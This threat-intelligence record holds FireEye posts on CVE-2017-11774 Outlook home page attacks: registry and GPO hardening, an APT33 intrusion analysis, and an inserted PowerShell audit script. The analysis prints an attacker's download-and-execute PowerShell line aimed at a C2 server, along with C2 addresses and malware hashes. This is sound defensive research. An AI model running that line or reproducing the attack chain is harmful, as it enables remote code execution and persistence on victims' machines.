Just like this blog post\u2019s illustration of several different home page URL registry keys abused in-the-wild \u2013 including the Outlook Today setting from September 2018 and the Calendar URL setting from UNC1194\u2019s November 2019 malicious macros \u2013 these non-default mailstores provide additional CVE-2017-11774 attack surface.\n\nThe registry key configuration to enforce the recommended registry configuration is as follows.\n\nHKEY_CURRENT_USER\\Software\\Microsoft\\Office\\<Outlook Version>\\Outlook\\Security \n\"NonDefaultStoreScript\"= dword:00000000 \n--- \n \nTo enforce the expected hardened configuration of the registry key for non-default mailstores using a GPO, the following setting can be configured.\n\n * User Configuration > Preferences > Windows Settings > Registry \n * New > Registry Item \n * Action: Update\n * Hive: HKEY_CURRENT_USER\n * Key Path: Software\\Microsoft\\Office\\<Outlook Version>\\Outlook\\Security \n * Value Name: NonDefaultStoreScript\n * Value Type: REG_DWORD\n * Value Data: 00000000\n\n\n\n \nFigure 4: NonDefaultStoreScript registry setting\n\nIncluded within the previously referenced Microsoft Office Administrative Templates, a GPO setting is available which can be configured to not allow folders in non-default stores to be set as folder home pages.\n\nUser Configuration > Policies > Administrative Templates > Microsoft Outlook <version> > Outlook Options > Other > Advanced > Do not allow folders in non-default stores to be set as folder home pages \n--- \n \nWhile you\u2019re locking things down, we thought that readers would also want to ensure they are locked down against RULER\u2019s other modules for [rules-based persistence](<https://sensepost.com/blog/2016/mapi-over-http-and-mailrule-pwnage/>) and [forms-based persistence](<https://sensepost.com/blog/2017/outlook-forms-and-shells/>). 
This last recommendation ensures that the rule types [required by the other RULER modules](<https://github.com/sensepost/ruler/issues/35#issuecomment-299695731>) are no longer permissible on an endpoint. While not CVE-2017-11774, this is closely related and this last setting is consistent with [Microsoft\u2019s prior guidance](<https://docs.microsoft.com/en-us/archive/blogs/office365security/defending-against-rules-and-forms-injection>) on rules and forms persistence.\n\nThe registry key configuration to protect against an attacker re-enabling \u201cRun as a Script\u201d and \u201cStart Application\u201d rules is as follows.\n\nHKEY_CURRENT_USER\\Software\\Microsoft\\Office\\<Outlook Version>\\Outlook\\Security\\ \n\"EnableUnsafeClientMailRules\"= dword:00000000 \n--- \n \nTo enforce the expected hardened configuration of the registry key using a GPO, the following setting can be configured.\n\n * User Configuration > Preferences > Windows Settings > Registry \n * New > Registry Item \n * Action: Update\n * Hive: HKEY_CURRENT_USER\n * Key Path: Software\\Microsoft\\Office\\<Outlook Version>\\Outlook\\Security \n * Value Name: EnableUnsafeClientMailRules\n * Value Type: REG_DWORD\n * Value Data: 00000000\n\n\n\n \nFigure 5: EnableUnsafeClientMailRules registry setting\n\nOnce all of the aforementioned endpoint policies are configured, we recommend a final step to protect these settings from unauthorized tampering. 
To ensure that the registry settings (configured via GPO) are continuously assessed and applied to an endpoint \u2013 even if the registry value was intentionally reversed by an attacker \u2013 the following GPO settings should also be configured and enforced:\n\n * Computer Configuration > Policies > Administrative Templates > System > Group Policy > Configure security policy processing \n * Enabled - Process even if the Group Policy objects have not changed\n * Computer Configuration > Policies > Administrative Templates > System > Group Policy > Configure registry policy processing \n * Enabled - Process even if the Group Policy objects have not changed\n\n\n\n \nFigure 6: Group Policy processing settings\n\nFor more environment hardening advice informed by front-line incident response, reach out to our Mandiant Security Transformation Services consulting team.\n\n#### Let\u2019s Go Hunt (doo doo doo)\n\nWith this blog post, we\u2019re providing an IOC for monitoring CVE-2017-11774 registry tampering \u2013 while written for FireEye Endpoint Security (HX) in the [OpenIOC 1.1 schema](<https://github.com/mandiant/OpenIOC_1.1>), this is a flexible behavioral detection standard that supports real-time and historical events and the logic can be repurposed for other endpoint products.\n\nThe Yara hunting rule provided by Nick Carr at the end of the OVERRULED blog post still captures payloads using CVE-2017-11774, including all of those used in intrusions referenced in this post, and can also be used to proactively identify home page exploits staged on adversary infrastructure. 
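The OpenIOC referenced above is not reproduced here. As an added example (not FireEye's IOC, nor code from the blog post or from SensePost), the following PowerShell audit reads the four hardening values listed in the GPO section for the current user and reports each one as hardened, not set, or tampered (present but holding the weak value the post warns an attacker can restore). The list of Outlook version subkeys (14.0, 15.0, 16.0) and the function name are assumptions; the key paths and value names come from the post.

```powershell
# Added audit example; not FireEye's OpenIOC and not part of the original post.
# Reports the state of the CVE-2017-11774 hardening values for the current user.

# Assumed Outlook version subkeys (2010, 2013, 2016/2019/365); adjust for your estate.
$script:OutlookVersions = '14.0', '15.0', '16.0'

# Expected hardened state, taken from the registry configurations listed above.
$script:ExpectedValues = @(
    @{ Sub = 'Outlook\WebView';  Name = 'Disable';                      Want = 1 }
    @{ Sub = 'Outlook\Security'; Name = 'EnableRoamingFolderHomepages'; Want = 0 }
    @{ Sub = 'Outlook\Security'; Name = 'NonDefaultStoreScript';        Want = 0 }
    @{ Sub = 'Outlook\Security'; Name = 'EnableUnsafeClientMailRules';  Want = 0 }
)

function Test-OutlookHomePageHardening {
    [CmdletBinding()]
    param([string[]] $Versions = $script:OutlookVersions)

    foreach ($v in $Versions) {
        $base = "HKCU:\Software\Microsoft\Office\$v"
        # Skip Office versions that are not installed for this user.
        if (-not (Test-Path -Path $base)) { continue }

        foreach ($e in $script:ExpectedValues) {
            $key    = Join-Path -Path $base -ChildPath $e.Sub
            $actual = $null
            if (Test-Path -Path $key) {
                # SilentlyContinue: a missing value simply yields $null.
                $actual = (Get-ItemProperty -Path $key -Name $e.Name -ErrorAction SilentlyContinue).($e.Name)
            }

            # NotSet means the GPO has not applied; TAMPERED means the value exists
            # but carries the weak setting an attacker would write to re-enable home pages.
            $status = if ($null -eq $actual)      { 'NotSet' }
                      elseif ($actual -eq $e.Want) { 'Hardened' }
                      else                         { 'TAMPERED' }

            [pscustomobject]@{
                Version  = $v
                Key      = $key
                Value    = $e.Name
                Expected = $e.Want
                Actual   = $actual
                Status   = $status
            }
        }
    }
}

# Usage: list every non-hardened value; exit non-zero so a scheduled job can alert on it.
$findings = Test-OutlookHomePageHardening | Where-Object { $_.Status -ne 'Hardened' }
$findings | Format-Table -AutoSize
if ($findings) { exit 1 }
```

Run it under the user's own context (the keys are in HKEY_CURRENT_USER, so an elevated session for a different account would read the wrong hive). A TAMPERED result on an endpoint where the GPO applies is the condition the registry-processing settings in Figure 6 are meant to reverse automatically; seeing it persist between policy refreshes is worth an investigation rather than just a re-push.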
Further FireEye product detection against CVE-2017-11774 is also covered in the OVERRULED blog post.\n\nIf you\u2019ve read the OVERRULED post (or are tired of hearing about it) but want some additional information, we recommend:\n\n * [\u201cYou\u2019ve Got Mail!\u201d CDS 2018 technical track presentation](<https://youtu.be/BERupu9-CIs>) including an APT34 CVE-2017-11774 home page sample\n * [\u201c2 Factor 2 Furious\u201d CDS 2018 technical track presentation](<https://www.youtube.com/watch?v=pxrwdB78nuM>) on attackers bypassing multifactor \u2013 the best first line of defense against APT33\u2019s password spraying and home page usage\n * [\u201c#GuardrailsOfTheGalaxy\u201d MITRE ATT&CKcon 2019 lightning talk](<https://www.youtube.com/watch?v=hrzR8TpnjAw&t=2098s>) on execution guardrails \u2013 or [see various examples shared on Twitter](<https://twitter.com/search?q=from%3Aitsreallynick%20guardrails%20OR%20guardrailsofthegalaxy&f=live>)\n\nInteresting MITRE ATT&CK techniques explicitly referenced in this blog post:\n\n| **ID** | **Technique** | **Context** |\n|---|---|---|\n| [T1137](<https://attack.mitre.org/techniques/T1137/>) | Office Application Startup | Nick Carr contributed CVE-2017-11774 on behalf of FireEye for expansion of this technique |\n| [T1480](<https://attack.mitre.org/techniques/T1480/>) | Execution Guardrails | Nick Carr contributed this new technique to MITRE ATT&CK and it is used within the UNC1194 red team sample in this blog post |\n\n#### Acknowledgements\n\nThe authors would like to acknowledge all of those at FireEye and the rest of the security industry who have combatted targeted attackers leveraging creative techniques like home page persistence, but especially the analysts in the Managed Defense SOC, who work around the clock to secure our customers and have disrupted this specific attack chain several times. 
We want to thank the [SensePost](<https://sensepost.com>) team \u2013 for their continued creativity, responsible disclosure of CVE-2017-11774, and their defensive-minded release of [NotRuler](<https://github.com/sensepost/notruler>) \u2013 as well as the [TrustedSec](<https://www.trustedsec.com>) crew for showing us some innovative implementations of these techniques and being great to coordinate with on this blog post. Lastly, thanks to Aristotle who has already offered what can only be interpreted as seasoned incident response and hardening advice for those who have seen RULER\u2019s home page persistence in-the-wild: _\u201cHe who is to be a good ruler must have first been ruled.\u201d_\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-12-04T00:00:00", "type": "fireeye", "title": "Breaking the Rules: A Tough Outlook for Home Page Attacks (CVE-2017-11774)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11774"], "modified": "2019-12-04T00:00:00", "id": "FIREEYE:138CE2722761C87436AF4E8AA1B5FF22", "href": 
"https://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-page-attacks.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-01-27T23:01:52", "description": "#### Introduction\n\nFireEye assesses APT33 may be behind a series of intrusions and attempted intrusions within the engineering industry. Public reporting indicates this activity may be related to recent destructive attacks. FireEye's [Managed Defense](<https://www.fireeye.com/solutions/managed-defense.html>) has responded to and contained numerous intrusions that we assess are related. The actor is leveraging publicly available tools in early phases of the intrusion; however, we have observed them transition to custom implants in later stage activity in an attempt to circumvent our detection.\n\nOn Sept. 20, 2017, FireEye Intelligence published a blog post detailing spear phishing activity [targeting Energy and Aerospace industries](<https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html>). Recent public reporting indicated possible links between the confirmed APT33 spear phishing and [destructive SHAMOON attacks](<https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/shamoon-attackers-employ-new-tool-kit-to-wipe-infected-systems/>); however, we were unable to independently verify this claim. FireEye\u2019s Advanced Practices team leverages telemetry and aggressive proactive operations to maintain visibility of APT33 and their attempted intrusions against our customers. These efforts enabled us to establish an operational timeline that was consistent with multiple intrusions Managed Defense identified and contained prior to the actor completing their mission. We correlated the intrusions using an internally-developed similarity engine described below. 
Additionally, public discussions have also indicated that specific attacker infrastructure we observed is possibly related to the recent destructive SHAMOON attacks.\n\n> 45 days ago, during 24x7 monitoring, [#ManagedDefense](<https://twitter.com/hashtag/ManagedDefense?src=hash&ref_src=twsrc%5Etfw>) detected & contained an attempted intrusion from newly-identified adversary infrastructure*. \n \nIt is C2 for a code family we track as POWERTON. \n \n*hxxps://103.236.149[.]100/api/info\n> \n> \u2014 FireEye (@FireEye) [December 15, 2018](<https://twitter.com/FireEye/status/1073744224510722048?ref_src=twsrc%5Etfw>)\n\n#### Identifying the Overlap in Threat Activity\n\nFireEye augments our expertise with an [internally-developed similarity engine](<https://www.camlis.org/matthew-berninger/>) to evaluate potential associations and relationships between groups and activity. Using concepts from document clustering and topic modeling literature, this engine provides a framework to calculate and discover similarities between groups of activities, and then develop investigative leads for follow-on analysis. Our engine identified similarities between a series of intrusions within the engineering industry. The near real-time results led to an in-depth comparative analysis. FireEye analyzed all available organic information from numerous intrusions and all known APT33 activity. We subsequently concluded, with medium confidence, that two specific early-phase intrusions were the work of a single group. Advanced Practices then reconstructed an operational timeline based on confirmed APT33 activity observed in the last year. We compared that to the timeline of the contained intrusions and determined there were circumstantial overlaps to include remarkable similarities in tool selection during specified timeframes. We assess with low confidence that the intrusions were conducted by APT33. 
This blog contains original source material only, whereas Finished Intelligence including an all-source analysis is [available within our intelligence portal](<https://intelligence.fireeye.com/reports/18-00021316>). To best understand the techniques employed by the adversary, it is necessary to provide background on our Managed Defense response to this activity during their 24x7 monitoring.\n\n#### Managed Defense Rapid Responses: Investigating the Attacker\n\nIn mid-November 2017, Managed Defense identified and responded to targeted threat activity at a customer within the engineering industry. The adversary leveraged stolen credentials and a publicly available tool, SensePost\u2019s [RULER](<https://github.com/sensepost/ruler>), to configure a client-side mail rule crafted to download and execute a malicious payload from an adversary-controlled WebDAV server 85.206.161[.]214@443\\outlook\\live.exe (MD5: _95f3bea43338addc1ad951cd2d42eb6f_).\n\nThe payload was an AutoIT downloader that retrieved and executed additional PowerShell from hxxps://85.206.161[.]216:8080/HomePage.htm. The follow-on PowerShell profiled the target system\u2019s architecture, downloaded the appropriate variant of PowerSploit (MD5: _c326f156657d1c41a9c387415bf779d4_ or _0564706ec38d15e981f71eaf474d0ab8_), and reflectively loaded PUPYRAT (MD5: _94cd86a0a4d747472c2b3f1bc3279d77_ or _17587668AC577FCE0B278420B8EB72AC_). The actor leveraged a publicly available exploit for CVE-2017-0213 to escalate privileges, publicly available Windows SysInternals PROCDUMP to dump the LSASS process, and publicly available MIMIKATZ to presumably steal additional credentials. Managed Defense aided the victim in containing the intrusion.\n\nFireEye collected 168 PUPYRAT samples for a comparison. 
While import hashes (IMPHASH) are insufficient for attribution, we found it remarkable that out of the specified sampling, the actor\u2019s IMPHASH was found in only six samples, two of which were confirmed to belong to the threat actor observed in Managed Defense, and one which is attributed to APT33. We also determined APT33 likely transitioned from PowerShell EMPIRE to PUPYRAT during this timeframe.\n\nIn mid-July of 2018, Managed Defense identified similar targeted threat activity focused against the same industry. The actor leveraged stolen credentials and RULER\u2019s module that exploits CVE-2017-11774 (RULER.HOMEPAGE), modifying numerous users\u2019 Outlook client homepages for code execution and persistence. These methods are further explored in this post in the \"RULER In-The-Wild\" section.\n\nThe actor leveraged this persistence mechanism to download and execute OS-dependent variants of the publicly available .NET POSHC2 backdoor as well as a newly identified PowerShell-based implant self-named POWERTON. Managed Defense rapidly engaged and successfully contained the intrusion. Of note, Advanced Practices separately established that APT33 began using POSHC2 as of at least July 2, 2018, and continued to use it throughout the duration of 2018.\n\nDuring the July activity, Managed Defense observed three variations of the homepage exploit hosted at hxxp://91.235.116[.]212/index.html. 
One example is shown in Figure 1.\n\n \nFigure 1: Attacker\u2019s homepage exploit (CVE-2017-11774)\n\nThe main encoded payload within each exploit leveraged WMIC to conduct system profiling in order to determine the appropriate OS-dependent POSHC2 implant and dropped to disk a PowerShell script named \u201cMedia.ps1\u201d within the user\u2019s %LOCALAPPDATA% directory (%LOCALAPPDATA%\\MediaWs\\Media.ps1) as shown in Figure 2.\n\n \nFigure 2: Attacker\u2019s \u201cMedia.ps1\u201d script\n\nThe purpose of \u201cMedia.ps1\u201d was to decode and execute the downloaded binary payload, which was written to disk as \u201cC:\\Users\\Public\\Downloads\\log.dat\u201d. At a later stage, this PowerShell script would be configured to persist on the host via a registry Run key.\n\nAnalysis of the \u201clog.dat\u201d payloads determined them to be variants of the publicly available POSHC2 proxy-aware stager written to download and execute PowerShell payloads from a hardcoded command and control (C2) address. These particular POSHC2 samples run on the .NET framework and dynamically load payloads from Base64 encoded strings. The implant will send a reconnaissance report via HTTP to the C2 server (hxxps://51.254.71[.]223/images/static/content/) and subsequently evaluate the response as PowerShell source code. The reconnaissance report contains the following information:\n\n * Username and domain\n * Computer name\n * CPU details\n * Current exe PID\n * Configured C2 server\n\nThe C2 messages are encrypted via AES using a hardcoded key and encoded with Base64. It is this POSHC2 binary that established persistence for the aforementioned \u201cMedia.ps1\u201d PowerShell script, which then decodes and executes the POSHC2 binary upon system startup. 
During the identified July 2018 activity, the POSHC2 variants were configured with a kill date of July 29, 2018.\n\nPOSHC2 was leveraged to download and execute a new PowerShell-based implant self-named POWERTON (hxxps://185.161.209[.]172/api/info). The adversary had limited success with interacting with POWERTON during this time. The actor was able to download and establish persistence for an AutoIt binary named \u201cClouldPackage.exe\u201d (MD5: 46038aa5b21b940099b0db413fa62687), which was achieved via the POWERTON \u201cpersist\u201d command. The sole functionality of \u201cClouldPackage.exe\u201d was to execute the following line of PowerShell code:\n\n[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }; $webclient = new-object System.Net.WebClient; $webclient.Credentials = new-object System.Net.NetworkCredential('public', 'fN^4zJp{5w#K0VUm}Z_a!QXr*]&2j8Ye'); iex $webclient.DownloadString('hxxps://185.161.209[.]172/api/default')\n\nThe purpose of this code is to retrieve \u201csilent mode\u201d POWERTON from the C2 server. Note the actor protected their follow-on payloads with strong credentials. Shortly after this, Managed Defense contained the intrusion.\n\nStarting approximately three weeks later, the actor reestablished access through a successful password spray. Managed Defense immediately identified the actor deploying malicious homepages with RULER to persist on workstations. They made some infrastructure and tooling changes to include additional layers of obfuscation in an attempt to avoid detection. The actor hosted their homepage exploit at a new C2 server (hxxp://5.79.66[.]241/index.html). At least three new variations of \u201cindex.html\u201d were identified during this period. 
Two of these variations contained encoded PowerShell code written to download new OS-dependent variants of the .NET POSHC2 binaries, as seen in Figure 3.\n\n \nFigure 3: OS-specific POSHC2 Downloader\n\nFigure 3 shows that the actor made some minor changes, such as encoding the PowerShell \"DownloadString\" commands and renaming the resulting POSHC2 and .ps1 files dropped to disk. Once decoded, the commands will attempt to download the POSHC2 binaries from yet another new C2 server (hxxp://103.236.149[.]124/delivered.dat). The name of the .ps1 file dropped to decode and execute the POSHC2 variant also changed to \u201cVision.ps1\u201d. During this August 2018 activity, the POSHC2 variants were configured with a \u201ckill date\u201d of Aug. 13, 2018. Note that POSHC2 supports a kill date in order to guardrail an intrusion by time and this functionality is built into the framework.\n\nOnce again, POSHC2 was used to download a new variant of POWERTON (MD5: _c38069d0bc79acdc28af3820c1123e53_), configured to communicate with the C2 domain hxxps://basepack[.]org. At one point in late-August, after the POSHC2 kill date, the adversary used RULER.HOMEPAGE to directly download POWERTON, bypassing the intermediary stages previously observed.\n\nDue to Managed Defense\u2019s early containment of these intrusions, we were unable to ascertain the actor\u2019s motivations; however, it was clear they were adamant about gaining and maintaining access to the victim\u2019s network.\n\n#### Adversary Pursuit: Infrastructure Monitoring\n\nAdvanced Practices conducts aggressive proactive operations in order to identify and monitor adversary infrastructure at scale. The adversary maintained a RULER.HOMEPAGE payload at hxxp://91.235.116[.]212/index.html between July 16 and Oct. 11, 2018. On at least Oct. 
11, 2018, the adversary changed the payload (MD5: _8be06571e915ae3f76901d52068e3498_) to download and execute a POWERTON sample from hxxps://103.236.149[.]100/api/info (MD5: _4047e238bbcec147f8b97d849ef40ce5_). This specific URL was identified in a [public discussion](<https://twitter.com/KseProso/status/1073169197541281792>) as possibly related to recent destructive attacks. We are unable to independently verify this correlation with any organic information we possess.\n\nOn Dec. 13, 2018, Advanced Practices proactively identified and attributed a malicious RULER.HOMEPAGE payload hosted at hxxp://89.45.35[.]235/index.html (MD5: _f0fe6e9dde998907af76d91ba8f68a05_). The payload was crafted to download and execute POWERTON hosted at hxxps://staffmusic[.]org/transfer/view (MD5: _53ae59ed03fa5df3bf738bc0775a91d9_).\n\nTable 1 contains the operational timeline for the activity we analyzed.\n\n| **DATE/TIME (UTC)** | **NOTE** | **INDICATOR** |\n|---|---|---|\n| 2017-08-15 17:06:59 | APT33 \u2013 EMPIRE (Used) | 8a99624d224ab3378598b9895660c890 |\n| 2017-09-15 16:49:59 | APT33 \u2013 PUPYRAT (Compiled) | 4b19bccc25750f49c2c1bb462509f84e |\n| 2017-11-12 20:42:43 | GroupA \u2013 AUT2EXE Downloader (Compiled) | 95f3bea43338addc1ad951cd2d42eb6f |\n| 2017-11-14 14:55:14 | GroupA \u2013 PUPYRAT (Used) | 17587668ac577fce0b278420b8eb72ac |\n| 2018-01-09 19:15:16 | APT33 \u2013 PUPYRAT (Compiled) | 56f5891f065494fdbb2693cfc9bce9ae |\n| 2018-02-13 13:35:06 | APT33 \u2013 PUPYRAT (Used) | 56f5891f065494fdbb2693cfc9bce9ae |\n| 2018-05-09 18:28:43 | GroupB \u2013 AUT2EXE (Compiled) | 46038aa5b21b940099b0db413fa62687 |\n| 2018-07-02 07:57:40 | APT33 \u2013 POSHC2 (Used) | fa7790abe9ee40556fb3c5524388de0b |\n| 2018-07-16 00:33:01 | GroupB \u2013 POSHC2 (Compiled) | 75e680d5fddbdb989812c7ba83e7c425 |\n| 2018-07-16 01:39:58 | GroupB \u2013 POSHC2 (Used) | 75e680d5fddbdb989812c7ba83e7c425 |\n| 2018-07-16 08:36:13 | GroupB \u2013 POWERTON (Used) | 46038aa5b21b940099b0db413fa62687 |\n| 2018-07-31 22:09:25 | APT33 \u2013 POSHC2 (Used) | 129c296c363b6d9da0102aa03878ca7f |\n| 2018-08-06 16:27:05 | GroupB \u2013 POSHC2 (Compiled) | fca0ad319bf8e63431eb468603d50eff |\n| 2018-08-07 05:10:05 | GroupB \u2013 POSHC2 (Used) | 75e680d5fddbdb989812c7ba83e7c425 |\n| 2018-08-29 18:14:18 | APT33 \u2013 POSHC2 (Used) | 5832f708fd860c88cbdc088acecec4ea |\n| 2018-10-09 16:02:55 | APT33 \u2013 POSHC2 (Used) | 8d3fe1973183e1d3b0dbec31be8ee9dd |\n| 2018-10-09 16:48:09 | APT33 \u2013 POSHC2 (Used) | 48d1ed9870ed40c224e50a11bf3523f8 |\n| 2018-10-11 21:29:22 | GroupB \u2013 POWERTON (Used) | 8be06571e915ae3f76901d52068e3498 |\n| 2018-12-13 11:00:00 | GroupB \u2013 POWERTON (Identified) | 99649d58c0d502b2dfada02124b1504c |\n\nTable 1: Operational Timeline\n\n#### Outlook and Implications\n\nIf the activities observed during these intrusions are linked to APT33, it would suggest that APT33 has likely maintained proprietary capabilities we had not previously observed until sustained pressure from Managed Defense forced their use. FireEye Intelligence has previously reported that APT33 has ties to destructive malware, and they pose a heightened risk to critical infrastructure. This risk is pronounced in the energy sector, which we consistently observe them target. That targeting aligns with Iranian national priorities for economic growth and competitive advantage, especially relating to petrochemical production.\n\nWe will continue to track these clusters independently until we achieve high confidence that they are the same. 
The operators behind each of the described intrusions are using publicly available but not widely understood tools and techniques in addition to proprietary implants as needed. Managed Defense has the privilege of being exposed to intrusion activity every day across a wide spectrum of industries and adversaries. This daily front line experience is backed by Advanced Practices, FireEye Labs Advanced Reverse Engineering (FLARE), and FireEye Intelligence to give our clients every advantage they can have against sophisticated adversaries. We welcome additional original source information we can evaluate to confirm or refute our analytical judgements on attribution.\n\n#### Custom Backdoor: POWERTON\n\nPOWERTON is a backdoor written in PowerShell; FireEye has not yet identified any publicly available toolset with a similar code base, indicating that it is likely custom-built. POWERTON is designed to support multiple persistence mechanisms, including [WMI](<https://www.fireeye.com/blog/threat-research/2016/08/wmi_vs_wmi_monitor.html>) and auto-run registry key. Communications with the C2 are over TCP/HTTP(S) and leverage AES encryption for communication traffic to and from the C2. 
POWERTON typically gets deployed as a later stage backdoor and is obfuscated with several layers.\n\nFireEye has witnessed at least two separate versions of POWERTON, tracked separately as POWERTON.v1 and POWERTON.v2, wherein the latter has improved its command and control functionality, and integrated the ability to dump password hashes.\n\nTable 2 contains samples of POWERTON.\n\n| **Hash of Obfuscated File (MD5)** | **Hash of Deobfuscated File (MD5)** | **Version** |\n|---|---|---|\n| **974b999186ff434bee3ab6d61411731f** | 3871aac486ba79215f2155f32d581dc2 | V1 |\n| **e2d60bb6e3e67591e13b6a8178d89736** | 2cd286711151efb61a15e2e11736d7d2 | V1 |\n| **bd80fcf5e70a0677ba94b3f7c011440e** | 5a66480e100d4f14e12fceb60e91371d | V1 |\n| **4047e238bbcec147f8b97d849ef40ce5** | f5ac89d406e698e169ba34fea59a780e | V2 |\n| **c38069d0bc79acdc28af3820c1123e53** | 4aca006b9afe85b1f11314b39ee270f7 | V2 |\n| **N/A** | 7f4f7e307a11f121d8659ca98bc8ba56 | V2 |\n| **53ae59ed03fa5df3bf738bc0775a91d9** | 99649d58c0d502b2dfada02124b1504c | V2 |\n\nTable 2: POWERTON malware samples\n\n#### Adversary Methods: Email Exploitation on the Rise\n\nOutlook and Exchange are synonymous with email access. User convenience is a primary driver behind technological advancements, but convenient access for users often reveals additional attack surface for adversaries. As organizations expose any email server access to the public internet for its users, those systems become intrusion vectors. 
FireEye has observed an increase in [targeted adversaries challenging and subverting security controls on Exchange and Office365.](<https://summit.fireeye.com/content/fireeye-summit/en_US/learn/tracks.html#technical-3>) Our Mandiant consultants also presented [several new methods used by adversaries to subvert multifactor authentication](<https://summit.fireeye.com/learn/tracks.html#technical-8>) at FireEye Cyber Defense Summit 2018.\n\nAt FireEye, our decisions are data driven, but data provided to us is often incomplete and missing pieces must be inferred based on our expertise in order for us to respond to intrusions effectively. A plausible scenario for exploitation of this vector is as follows.\n\nAn adversary has a single pair of valid credentials for a user within your organization obtained through any means, to include the following non-exhaustive examples:\n\n * Third party breaches where your users have re-used credentials; does your enterprise leverage a naming standard for email addresses such as first.last@yourorganization.tld? It is possible that a user within your organization has a personal email address with a first and last name--and an affiliated password--compromised in a third-party breach somewhere. 
Did they re-use that password?\n * Previous compromise within your organization where credentials were compromised but not identified or reset.\n * Poor password choice or password security policies resulting in brute-forced credentials.\n * Gathering of crackable password hashes from various other sources, such as NTLM hashes gathered via [documents](<https://bohops.com/2018/08/04/capturing-netntlm-hashes-with-office-dot-xml-documents/>) intended to phish them from users.\n * Credential harvesting phishing scams, where harvested credentials may be sold, re-used, or documented permanently elsewhere on the internet.\n\nOnce the adversary has legitimate credentials, they identify publicly accessible Outlook Web Access (OWA) or Office 365 that is not protected with multi-factor authentication. The adversary leverages the stolen credentials and a tool like RULER to deliver exploits through Exchange\u2019s legitimate features.\n\n#### RULER In-The-Wild: Here, There, and Everywhere\n\nSensePost\u2019s RULER is a tool designed to interact with Exchange servers via a messaging application programming interface (MAPI), or via remote procedure calls (RPC), both over HTTP protocol. As detailed in the \"Managed Defense Rapid Responses\" section, in mid-November 2017, FireEye witnessed network activity generated by an existing Outlook email client process on a single host, indicating connection via Web Distributed Authoring and Versioning (WebDAV) to an adversary-controlled IP address 85.206.161[.]214. 
This communication retrieved an executable created with _Aut2Exe_ (MD5: _95f3bea43338addc1ad951cd2d42eb6f_), and executed a PowerShell one-liner to retrieve further malicious content.\n\nWithout the requisite logging from the impacted mailbox, we can still assess that this activity was the result of a malicious mail rule created using the aforementioned tooling for the following reasons:\n\n * Outlook.exe directly requested the malicious executable hosted at the adversary IP address over WebDAV. This is unexpected unless some feature of Outlook directly was exploited; traditional vectors like phishing would show a process ancestry where Outlook spawned a child process of an Office product, Acrobat, or something similar. Process injection would imply prior malicious code execution on the host, which evidence did not support.\n * The transfer of _95f3bea43338addc1ad951cd2d42eb6f_ was over WebDAV. RULER facilitates this by exposing a simple WebDAV server, and a command line module for creating a client-side mail rule to point at that [WebDAV hosted payload](<https://github.com/sensepost/ruler/wiki/Rules#webdav>).\n * The choice of WebDAV for this initial transfer of stager is the result of restrictions in mail rule creation; the payload must be \"locally\" accessible before the rule can be saved, meaning protocol handlers for something like HTTP or FTP are not permitted. This is thoroughly detailed in Silent Break Security's [initial write-up](<https://silentbreaksecurity.com/malicious-outlook-rules/>) prior to RULER\u2019s creation. This leaves SMB and WebDAV via UNC file pathing as the available options for transferring your malicious payload via an Outlook Rule. 
WebDAV is likely the less alerting option from a networking perspective, as one is more likely to find WebDAV transactions occurring over ports 80 and 443 to the internet than they are to find a domain joined host communicating via SMB to a non-domain joined host at an arbitrary IP address.\n * The payload to be executed via Outlook client-side mail rule must contain no arguments, which is likely why a compiled Aut2exe executable was chosen. _95f3bea43338addc1ad951cd2d42eb6f_ does nothing but execute a PowerShell one-liner to retrieve additional malicious content for execution. However, execution of this command natively using an Outlook rule was not possible due to this limitation.\n\nWith that in mind, the initial infection vector is illustrated in Figure 4.\n\n \nFigure 4: Initial infection vector\n\nAs both attackers and defenders continue to explore email security, publicly-released techniques and exploits are quickly adopted. SensePost's identification and responsible [disclosure of CVE-2017-11774](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2017-11774>) was no different. For an excellent description of abusing Outlook's home page for shell and persistence from an attacker\u2019s perspective, [refer to SensePost's blog](<https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/>).\n\nFireEye [has observed](<https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s03-youve-got-mail.pdf>) and [documented](<https://twitter.com/ItsReallyNick/status/1014522001900306433>) an uptick in several malicious attackers' usage of this specific home page exploitation technique. Based on our experience, this particular method may be more successful due to defenders misinterpreting artifacts and focusing on incorrect mitigations. 
This is understandable, as some defenders may first learn of successful CVE-2017-11774 exploitation when observing Outlook spawning processes resulting in malicious code execution. When this observation is combined with standalone forensic artifacts that may look similar to malicious HTML Application (.hta) attachments, the evidence may be misinterpreted as initial infection via a phishing email. This incorrect assumption overlooks the fact that attackers require valid credentials to deploy CVE-2017-11774, and thus the scope of the compromise may be greater than individual users' Outlook clients where home page persistence is discovered. To assist defenders, we're including a Yara rule to differentiate these Outlook home page payloads at the end of this post.\n\nUnderstanding this nuance further highlights the exposure to this technique when combined with password spraying as documented with this attacker, and underscores the importance of layered email security defenses, including multi-factor authentication and patch management. We recommend the organizations reduce their email attack surface as much as possible. Of note, organizations that choose to host their email with a cloud service provider must still ensure the software clients used to access that server are patched. 
